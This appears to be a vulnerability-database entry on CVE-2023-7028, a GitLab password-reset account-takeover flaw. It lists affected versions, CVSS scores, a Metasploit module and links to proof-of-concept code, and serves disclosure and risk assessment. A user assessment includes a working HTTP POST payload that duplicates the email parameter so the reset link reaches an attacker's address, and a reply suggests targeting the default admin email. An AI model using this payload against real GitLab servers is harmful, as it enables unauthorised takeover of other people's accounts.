Attacker Value

Very High

(1 user assessed)

Exploitability

Very High

(1 user assessed)

User Interaction

CVE-2023-7028

Disclosure Date: January 12, 2024 •

CVE-2023-7028 CVSS v3 Base Score: 7.5

MITRE ATT&CK

Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Initial Access

Techniques

Validation

Exploit Public-Facing Application

Validated

Metasploit Module

auxiliary/admin/http/gitlab_password_reset_account_takeover

Description

An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.

Add Assessment

noraj (102)

January 12, 2024 10:51am UTC (3 months ago)•

Ratings

Attacker Value

Very High

Exploitability

Very High

Common in enterprise Easy to weaponize Gives privileged access Unauthenticated Vulnerable in default configuration

Technical Analysis

Tested on Gitlab CE 16.6.1. Very effective and easy to exploit. In the following payload the brackets MUST be URL encoded, else it won’t work: user[email][]=victim@example.org&user[email][]=attacker@example.org.

POST /users/password HTTP/2
Host: gitlab.example.org
...

authenticity_token=<auto_generated_token>&user%5Bemail%5D%5B%5D=victim%40example.org&user%5Bemail%5D%5B%5D=attacker%40example.org

Note that you must know the email address and not the login name.

See here for vulnerable and patched versions.

See More &1 replySee Less

imjdl (3) January 12, 2024 11:14am UTC (3 months ago)

Or use the default administrator email admin@example.com

CVSS V3 Severity and Metrics

Data provided by the National Vulnerability Database (NVD)

Base Score:

7.5 High

Impact Score:

3.6

Exploitability Score:

3.9

Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

None

User Interaction (UI):

None

Scope (S):

Unchanged

Confidentiality (C):

High

Integrity (I):

None

Availability (A):

None

Vendors

gitlab

Products

gitlab

Metasploit Modules

auxiliary/admin/http/gitlab_password_reset_account_takeover (https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/http/gitlab_password_reset_account_takeover.rb)

References

Canonical

CVE-2023-7028 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7028)

Exploit

The following exploit POCs have not been verified by Rapid7 researchers, but are sourced from: nomi-sec/PoC-in-GitHub.
Additional sources will be added here as they become relevant.
Notes: We will only add the top 3 POCs for a given CVE. POCs added here must have at least 2 GitHub stars.

PoC (https://github.com/Vozec/CVE-2023-7028 )

PoC (https://github.com/RandomRobbieBF/CVE-2023-7028 )

CVE-2023-7028 (https://github.com/Vozec/CVE-2023-7028)

CVE-2023-7028 (https://github.com/V1lu0/CVE-2023-7028)

CVE-2023-7028 (https://github.com/RandomRobbieBF/CVE-2023-7028)